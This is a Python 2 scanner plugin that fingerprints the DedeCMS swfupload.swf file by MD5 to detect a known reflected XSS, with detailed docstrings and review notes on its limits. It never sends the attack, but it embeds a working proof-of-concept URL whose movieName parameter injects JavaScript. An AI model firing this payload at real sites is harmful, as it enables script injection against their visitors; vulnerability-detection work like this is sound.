#! /usr/bin/env python
# -*- coding: utf-8 -*-

import hashlib
import md5
import urllib2
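class Exploit:
    """Fingerprint check for the DedeCMS ``swfupload.swf`` reflected XSS.

    The check downloads ``/images/swfupload/swfupload.swf`` from the target
    and compares its MD5 digest with one known build. It never requests the
    proof-of-concept URL; that URL is only written into the report so an
    operator can confirm the finding by hand.

    Limits a reader of the report should keep in mind:

    * Only the exact build matching ``flash_md5`` is detected. Any other
      build, vulnerable or not, is reported as not detected.
    * Every request or read error is swallowed, so an unreachable target
      and a clean target produce the same result.
    * MD5 is used purely as a file fingerprint here, not as an integrity
      or authenticity control.
    * NOTE(review): urllib2 verifies HTTPS certificates by default only on
      Python 2.7.9 and later; on older interpreters the fetched file could
      be substituted in transit.
    """

    name = u"dedecms swfupload.swf反射xss"

    def __init__(self, target, expfile):
        """Store the target and build the initial (negative) result record.

        Args:
            target: Base URL of the site to check, e.g. ``http://host``.
            expfile: Plugin file name without extension; ``.py`` is appended
                for the ``filename`` field of the report.
        """
        self.target = target
        self.result = {
            "name": "DeDeCMS swfupload.swf反射xss",
            "author": "Lcy",
            "type": "website",
            "ref": "https://phpinfo.me",
            "status": False,
            "info": "",
            'filename': expfile + ".py",
            "target": target,
        }

    def verify(self):
        """Fetch the Flash file and flag the target if its digest matches.

        On a match ``self.result['status']`` becomes True and
        ``self.result['info']`` receives the report line. On a mismatch or
        on any error the result record is left untouched. Returns None.
        """
        flash_md5 = "3a1c6cc728dddc258091a601f28a9c12"
        file_path = "/images/swfupload/swfupload.swf"
        # Upper bound on how much of the response is read, so an oversized
        # or endless body cannot exhaust memory. The fingerprinted file is
        # presumably far smaller than this; re-check if flash_md5 changes.
        max_swf_bytes = 1024 * 1024

        # Drop a trailing slash so "http://host/" does not produce
        # "http://host//images/...", which some servers answer with a 404.
        file_url = self.target.rstrip("/") + file_path
        # Reported for manual confirmation only; never requested here.
        expurl = file_url + "?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22xss%22%29}}//"
        try:
            req = urllib2.Request(file_url)
            res = urllib2.urlopen(req, timeout=3)
            try:
                file_content = res.read(max_swf_bytes)
            finally:
                # Release the connection even when the read fails.
                res.close()
            md5_value = hashlib.md5(file_content).hexdigest()
            # Exact comparison: a digest either is the known build or is not.
            if md5_value == flash_md5:
                self.result['status'] = True
                self.result['info'] = "%s存在dedecms swfupload反射xss，验证url:%s" % (self.target, expurl)
        except Exception:
            # Deliberate best effort: the caller only reads self.result, so
            # a failed request must not abort a scan run.
            # NOTE(review): this makes "request failed" indistinguishable
            # from "not vulnerable"; consider surfacing the error.
            pass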
                            